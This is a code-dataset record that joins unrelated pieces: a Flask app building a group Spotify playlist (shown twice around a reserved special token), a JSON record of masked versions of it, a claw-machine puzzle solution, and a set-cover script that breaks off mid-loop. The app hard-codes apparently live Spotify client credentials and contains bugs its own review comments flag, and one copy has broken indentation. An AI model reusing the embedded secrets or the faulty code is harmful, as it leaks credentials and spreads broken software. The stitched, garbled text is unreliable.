from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
# Configure the Flask application.
app = Flask(__name__)
# NOTE(review): Spotify API credentials are hard-coded in source; they
# should be moved to environment variables before publishing.
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
# In debug mode, disable client-side caching so edits show up immediately.
if app.config['DEBUG']:
    @app.after_request
    def after_request(response):
        response.headers['Cache-Control'
            ] = 'no-cache, no-store, must-revalidate'
        response.headers['Expires'] = 0
        response.headers['Pragma'] = 'no-cache'
        return response
# Store sessions on the filesystem (temp dir) instead of signed cookies.
app.config['SESSION_FILE_DIR'] = mkdtemp()
app.config['SESSION_PERMANENT'] = False
app.config['SESSION_TYPE'] = 'filesystem'
Session(app)
# Track ids pooled from all connected users (module-level, shared).
tracks = []
# Receive a newly connected user's top-track ids and pool them.
@app.route('/tracks', methods=['POST'])
def get_user_tracks():
    """Append the POSTed track ids to the shared module-level list."""
    ids = json.loads(request.data)['ids']
    tracks.extend(ids)
    return 'success'
# Main page: builds the shared playlist and renders it embedded.
@app.route('/')
@login_required
def index():
    username = session['username']
    # Fast path: host already authorised and the playlist already exists.
    if session.get('token') and session.get('playlist_dict'):
        # NOTE(review): `tracks` is assigned later in this function, which
        # makes it local everywhere in the function — this reference raises
        # UnboundLocalError instead of reading the module-level list.
        group_playlist = gen_playlist(tracks)
        sp = spotipy.Spotify(auth=session['token'])
        playlist = sp.user_playlist_add_tracks(username, session[
            'playlist_dict']['id'], group_playlist)
        return render_template('index.html', playlist_url=session[
            'playlist_dict']['uri'])
    # Ask Spotify for an OAuth token with playlist/top-read scope.
    token = util.prompt_for_user_token(username,
        'playlist-modify-public user-top-read', client_id=client_id,
        client_secret=client_secret, redirect_uri='http://127.0.0.1')
    if token:
        session['token'] = token
        sp = spotipy.Spotify(auth=token)
        # Fetch the host's top 20 medium-term tracks to seed the playlist.
        track_dict = sp.current_user_top_tracks(limit=20, offset=0,
            time_range='medium_term')
        tracks = list(map(lambda x: x['id'], track_dict['items']))
        group_playlist = gen_playlist(tracks)
        playlist_dict = sp.user_playlist_create(username, 'Group Playlist')
        playlist_id = playlist_dict['id']
        user = playlist_dict['owner']
        playlist = sp.user_playlist_add_tracks(username, playlist_id,
            group_playlist)
    else:
        print("Can't get token for " + username)
    # NOTE(review): when no token was obtained, playlist_dict is unbound
    # here and this line raises NameError.
    url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']
    session['playlist_url'] = playlist_dict['uri']
    return render_template('index.html', playlist_url=url)
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Log user in.

    GET shows the form; POST stores the submitted username in the session
    (when present) and redirects to the index either way.
    """
    session.clear()
    # NOTE(review): this rebinds a local name only; the module-level
    # `tracks` list is not cleared here.
    tracks = []
    if request.method == 'POST':
        if request.form.get('username'):
            session['username'] = request.form.get('username')
        # Redirect even when no username was submitted.
        return redirect('/')
    else:
        return render_template('login.html')
def compare_score(song, total_features, features):
    """Return a similarity score between one track's audio features and the
    aggregated totals; lower means closer (``song`` is unused).
    """
    score = 0.0
    # features is the one-element list returned by sp.audio_features().
    for key, value in features[0].items():
        # Only float-valued audio features contribute to the score.
        if isinstance(value, float):
            score += value * 1.0 / (1.0 * (total_features[key] + value))
    return score
def gen_playlist(track_ids):
    """Return up to 20 track ids whose audio features are closest to the
    group's average feature profile (lower compare_score = closer).
    """
    client_credentials_manager = SpotifyClientCredentials(client_id,
        client_secret)
    sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
    total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
        'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
        0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
        'tempo': 0.0}
    song_counter = 0.0
    # Fetch each track's audio features once and cache them; the original
    # re-queried the API a second time while scoring.
    features_cache = {}
    for song in track_ids:
        song_counter += 1
        features = sp.audio_features(tracks=[song])
        features_cache[song] = features
        for key, value in features[0].items():
            if isinstance(value, float):
                total_features[key] += value
    # Average the aggregated features. BUG FIX: the original divided the
    # loop *variable* (`value /= song_counter`), which never wrote back
    # into the dict, so no averaging actually happened.
    if song_counter > 0:
        for key in total_features:
            total_features[key] /= song_counter
    # Score every track against the averaged profile and keep the 20 closest.
    song_list = []
    for song in track_ids:
        score = compare_score(song, total_features, features_cache[song])
        song_list.append((song, score))
    song_list = sorted(song_list, key=lambda x: x[1])
    if len(song_list) > 20:
        song_list = song_list[:20]
    song_list = [song_list[i][0] for i in range(len(song_list))]
    return song_list
<|reserved_special_token_1|>
import json
import spotipy
import spotipy.util as util
from spotipy.oauth2 import SpotifyClientCredentials
from flask import abort, Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from helpers import login_required
# Configure application
app = Flask(__name__)
# NOTE(review): Spotify API credentials are hard-coded in source; move
# them to environment variables before publishing this code.
client_id = '320606726d354474b5da64233babe82d'
client_secret = 'f2d15a0b056343cfa094525adfc45f27'
# Ensure responses aren't cached (debug mode only)
if app.config["DEBUG"]:
    @app.after_request
    def after_request(response):
        response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
        response.headers["Expires"] = 0
        response.headers["Pragma"] = "no-cache"
        return response
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# list of track ids gathered from users (module-level, shared)
tracks = []
# retrieve top tracks from newly connected user
@app.route("/tracks", methods = ["POST"])
def get_user_tracks():
    """Append the POSTed track ids to the shared module-level list."""
    ids = json.loads(request.data)['ids']
    tracks.extend(ids)
    return 'success'
# Main page. Runs playlist generation and displays the embedded playlist.
@app.route("/")
@login_required
def index():
    username = session["username"]
    # host has already logged in and playlist is already made
    if session.get("token") and session.get("playlist_dict"):
        # NOTE(review): `tracks` is assigned later in this function, which
        # makes it local everywhere in the function — this reference raises
        # UnboundLocalError instead of reading the module-level list.
        group_playlist = gen_playlist(tracks)
        sp = spotipy.Spotify(auth=session["token"])
        playlist = sp.user_playlist_add_tracks(username, session["playlist_dict"]['id'], group_playlist) # add to the playlist
        return render_template("index.html", playlist_url=session["playlist_dict"]['uri'])
    # Ask Spotify for an OAuth token with playlist/top-read scope.
    token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')
    if token:
        session["token"] = token
        sp = spotipy.Spotify(auth=token)
        track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks
        tracks = list(map(lambda x: x['id'], track_dict['items']))
        group_playlist = gen_playlist(tracks)
        playlist_dict = sp.user_playlist_create(username, "Group Playlist")
        playlist_id = playlist_dict['id']
        user = playlist_dict['owner']
        playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated
    else:
        print("Can't get token for " + username)
    # NOTE(review): when no token was obtained, playlist_dict is unbound
    # here and this line raises NameError.
    url = "https://open.spotify.com/embed?uri=" + playlist_dict['uri']
    session["playlist_url"] = playlist_dict['uri']
    return render_template("index.html", playlist_url=url)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
tracks = []
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if request.form.get("username"):
session["username"] = request.form.get("username")
return redirect("/")
else:
return render_template("login.html")
# Returns a score of how similar two songs are. The lower the score, the smaller the differences.
def compare_score(song, total_features, features):
    """Return a similarity score between one track's audio features and the
    aggregated totals; lower means closer (``song`` is unused).
    """
    score=0.0
    # features is the one-element list returned by sp.audio_features().
    for key, value in features[0].items():
        # Only float-valued audio features contribute to the score.
        if isinstance(value, float):
            score+=(value*1.0)/((1.0)*(total_features[key]+value))
    return score
# Generates an intelligent playlist from the pooled track ids.
def gen_playlist(track_ids):
    """Return up to 20 track ids whose audio features are closest to the
    group's average feature profile (lower compare_score = closer).
    """
    client_credentials_manager = SpotifyClientCredentials(client_id,
        client_secret)
    sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
    total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,
        'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness':
        0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,
        'tempo': 0.0}
    song_counter = 0.0
    # Fetch each track's audio features once and cache them; the original
    # re-queried the API a second time while scoring.
    features_cache = {}
    for song in track_ids:
        song_counter += 1
        features = sp.audio_features(tracks=[song])
        features_cache[song] = features
        for key, value in features[0].items():
            if isinstance(value, float):
                total_features[key] += value
    # Average the aggregated features. BUG FIX: the original divided the
    # loop *variable* (`value /= song_counter`), which never wrote back
    # into the dict, so no averaging actually happened.
    if song_counter > 0:
        for key in total_features:
            total_features[key] /= song_counter
    # Score every track against the averaged profile and keep the 20 closest.
    song_list = []
    for song in track_ids:
        score = compare_score(song, total_features, features_cache[song])
        song_list.append((song, score))
    song_list = sorted(song_list, key=lambda x: x[1])
    if len(song_list) > 20:
        song_list = song_list[:20]
    song_list = [song_list[i][0] for i in range(len(song_list))]
    return song_list
|
flexible
|
{
"blob_id": "4f674b30c919c7ec72c11a8edd9692c91da7cb90",
"index": 9595,
"step-1": "<mask token>\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\n<mask token>\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = 
spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-2": "<mask token>\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n<mask token>\nSession(app)\n<mask token>\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = 
request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-3": "<mask token>\napp = Flask(__name__)\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ntracks = []\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', 
playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-4": "import json\nimport spotipy\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom flask import abort, Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom helpers import login_required\napp = Flask(__name__)\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\nif app.config['DEBUG']:\n\n @app.after_request\n def after_request(response):\n response.headers['Cache-Control'\n ] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ntracks = []\n\n\n@app.route('/tracks', methods=['POST'])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n return 'success'\n\n\n@app.route('/')\n@login_required\ndef index():\n username = session['username']\n if session.get('token') and session.get('playlist_dict'):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session['token'])\n playlist = sp.user_playlist_add_tracks(username, session[\n 'playlist_dict']['id'], group_playlist)\n return render_template('index.html', playlist_url=session[\n 'playlist_dict']['uri'])\n token = util.prompt_for_user_token(username,\n 'playlist-modify-public user-top-read', client_id=client_id,\n client_secret=client_secret, redirect_uri='http://127.0.0.1')\n if token:\n session['token'] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0,\n time_range='medium_term')\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n group_playlist = gen_playlist(tracks)\n playlist_dict = sp.user_playlist_create(username, 'Group Playlist')\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n playlist = 
sp.user_playlist_add_tracks(username, playlist_id,\n group_playlist)\n else:\n print(\"Can't get token for \" + username)\n url = 'https://open.spotify.com/embed?uri=' + playlist_dict['uri']\n session['playlist_url'] = playlist_dict['uri']\n return render_template('index.html', playlist_url=url)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n tracks = []\n if request.method == 'POST':\n if request.form.get('username'):\n session['username'] = request.form.get('username')\n return redirect('/')\n else:\n return render_template('login.html')\n\n\ndef compare_score(song, total_features, features):\n score = 0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score += value * 1.0 / (1.0 * (total_features[key] + value))\n return score\n\n\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id,\n client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features = {'danceability': 0.0, 'energy': 0.0, 'key': 0.0,\n 'loudness': 0.0, 'mode': 0.0, 'speechiness': 0.0, 'acousticness': \n 0.0, 'instrumentalness': 0.0, 'liveness': 0.0, 'valence': 0.0,\n 'tempo': 0.0}\n song_counter = 0.0\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n song_list = []\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(\n tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key=lambda x: x[1])\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n",
"step-5": "import json\nimport spotipy\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\nfrom flask import abort, Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\n\nfrom helpers import login_required\n\n# Configure application\napp = Flask(__name__)\n\nclient_id = '320606726d354474b5da64233babe82d'\nclient_secret = 'f2d15a0b056343cfa094525adfc45f27'\n\n# Ensure responses aren't cached\nif app.config[\"DEBUG\"]:\n @app.after_request\n def after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# list of track ids gathered from users\ntracks = []\n\n# retrieve top tracks from newly connected user\n@app.route(\"/tracks\", methods = [\"POST\"])\ndef get_user_tracks():\n ids = json.loads(request.data)['ids']\n tracks.extend(ids)\n\n return 'success'\n\n# Main page. 
Runs playlist generation and displays the embedded playlist.\n@app.route(\"/\")\n@login_required\ndef index():\n username = session[\"username\"]\n\n # host has already logged in and playlist is already made\n if session.get(\"token\") and session.get(\"playlist_dict\"):\n group_playlist = gen_playlist(tracks)\n sp = spotipy.Spotify(auth=session[\"token\"])\n playlist = sp.user_playlist_add_tracks(username, session[\"playlist_dict\"]['id'], group_playlist) # add to the playlist\n return render_template(\"index.html\", playlist_url=session[\"playlist_dict\"]['uri'])\n\n token = util.prompt_for_user_token(username,'playlist-modify-public user-top-read', client_id=client_id,client_secret=client_secret,redirect_uri='http://127.0.0.1')\n if token:\n session[\"token\"] = token\n sp = spotipy.Spotify(auth=token)\n track_dict = sp.current_user_top_tracks(limit=20, offset=0, time_range='medium_term') # get the hosts top tracks\n tracks = list(map(lambda x: x['id'], track_dict['items']))\n\n group_playlist = gen_playlist(tracks)\n\n playlist_dict = sp.user_playlist_create(username, \"Group Playlist\")\n playlist_id = playlist_dict['id']\n user = playlist_dict['owner']\n\n playlist = sp.user_playlist_add_tracks(username, playlist_id, group_playlist) # playlist is now populated\n else:\n print(\"Can't get token for \" + username)\n\n url = \"https://open.spotify.com/embed?uri=\" + playlist_dict['uri']\n session[\"playlist_url\"] = playlist_dict['uri']\n return render_template(\"index.html\", playlist_url=url)\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n # Forget any user_id\n session.clear()\n tracks = []\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n # Ensure username was submitted\n if request.form.get(\"username\"):\n session[\"username\"] = request.form.get(\"username\")\n return redirect(\"/\")\n\n else:\n return render_template(\"login.html\")\n\n# Returns a 
score of how similar two songs are. The lower the score, the lesser the differences.\ndef compare_score(song, total_features, features):\n score=0.0\n for key, value in features[0].items():\n if isinstance(value, float):\n score+=(value*1.0)/((1.0)*(total_features[key]+value))\n return score\n\n# Generates and intelligent playlist\ndef gen_playlist(track_ids):\n client_credentials_manager = SpotifyClientCredentials(client_id, client_secret)\n sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n total_features={\"danceability\":0.0, \"energy\":0.0, \"key\":0.0, \"loudness\":0.0, \"mode\":0.0, \"speechiness\":0.0, \"acousticness\":0.0, \"instrumentalness\":0.0, \"liveness\":0.0, \"valence\":0.0, \"tempo\":0.0}\n song_counter=0.0\n \n # Aggregating song features\n for song in track_ids:\n song_counter += 1\n features = sp.audio_features(tracks=[song])\n for key, value in features[0].items():\n if isinstance(value, float):\n total_features[key] += value\n \n # Averaging out the songs features\n if song_counter > 0:\n for key, value in total_features.items():\n value /= song_counter\n\n # now we find all the songs close enough to the \"average\"\n song_list=[]\n for song in track_ids:\n score = compare_score(song, total_features, sp.audio_features(tracks=[song]))\n song_list.append((song, score))\n song_list = sorted(song_list, key = lambda x: x[1])\n\n # Getting the first 20 closest, best songs.\n if len(song_list) > 20:\n song_list = song_list[:20]\n song_list = [song_list[i][0] for i in range(len(song_list))]\n return song_list\n\n\n\n\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
# Example input: board rows (top to bottom) and the 1-based columns the
# claw visits on each move.
board = [[0,0,0,0,0],[0,0,1,0,3],[0,2,5,0,1],[4,2,4,4,2],[3,5,1,3,1]]
moves = [1,5,3,5,1,2,1,4]
# Logic: simulate the claw, stacking picked dolls and popping matching pairs.
resultList = []
count = 0
for nth in moves:
    for i in range(len(board)):
        selected = board[i][nth - 1]
        if selected == 0:
            continue
        else:
            # Push the picked doll onto the result stack.
            resultList.append(selected)
            # If the top two dolls on the stack match, pop both and count them.
            lenR = len(resultList)
            if lenR > 1:
                if resultList[lenR - 2] == resultList[lenR - 1]:
                    del resultList[lenR - 2:]
                    count += 2
            # The picked doll disappears from the board.
            board[i][nth - 1] = 0
            break
# print(resultList)
print(count)
|
normal
|
{
"blob_id": "18e032b7ff7ae9d3f5fecc86f63d12f4da7b8067",
"index": 6180,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n resultList.append(selected)\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n board[i][nth - 1] = 0\n break\nprint(count)\n",
"step-3": "board = [[0, 0, 0, 0, 0], [0, 0, 1, 0, 3], [0, 2, 5, 0, 1], [4, 2, 4, 4, 2],\n [3, 5, 1, 3, 1]]\nmoves = [1, 5, 3, 5, 1, 2, 1, 4]\nresultList = []\ncount = 0\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n resultList.append(selected)\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n board[i][nth - 1] = 0\n break\nprint(count)\n",
"step-4": "# 예시 입력값\nboard = [[0,0,0,0,0],[0,0,1,0,3],[0,2,5,0,1],[4,2,4,4,2],[3,5,1,3,1]]\nmoves = [1,5,3,5,1,2,1,4]\n\n# 로직\nresultList = []\ncount = 0\n\nfor nth in moves:\n for i in range(len(board)):\n selected = board[i][nth - 1]\n if selected == 0:\n continue\n else:\n # 인형을 resultList에 넣고\n resultList.append(selected)\n # resultList를 탐색하여 같은 인형이 있는지 보기\n lenR = len(resultList)\n if lenR > 1:\n if resultList[lenR - 2] == resultList[lenR - 1]:\n del resultList[lenR - 2:]\n count += 2\n\n # 뽑힌 인형은 board에서 사라짐\n board[i][nth - 1] = 0\n break\n\n# print(resultList)\nprint(count)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
class subset:
def __init__(self, weight, itemSet, size, setNum):
self.weight = weight
self.itemSet = itemSet
self.size = size
self.setNum = setNum
def findCover(base, arr):
uniq = [] #array that can be union
uni = [] #array has been unionized w/ base
if len(base.itemSet) == rangeOfVal:
# print("COVER:", base.itemSet)
return base
remain = rangeOfVal
# Search through arr to find all potential subsets
for i in arr:
# print("compare: ", i.itemSet)
if base.itemSet.isdisjoint(i.itemSet) == True:
# Unique array
uniq.append(i)
remain = remain - len(i.itemSet)
# print("uniq: ", len(uniq))
addedSub = subset(base.weight + i.weight,
base.itemSet.union(i.itemSet),
base.size + i.size,
str(base.setNum) + " " + str(i.setNum))
# Union array
uni.append(addedSub)
print("added:", addedSub.itemSet)
if addedSub.size == rangeOfVal:
# print("COVER:", addedSub.itemSet)
return addedSub
print()
for j in uni:
# print(j.setNum)
if remain == len(base.itemSet):
findCover(j, uniq)
# print("_____________________________NONE_______________________________")
return
# fileName="./inputs/input_group115.txt"
fileName="Input_attempt3.txt"
f=open(fileName, "r")
rangeOfVal=int(f.readline()) # n
numOfSub=int(f.readline()) # m
num=0
minWeight=500001
minCover=[]
subsetList=[]
# Loop to read through file and set up the data structures
# to hold all the values
while True:
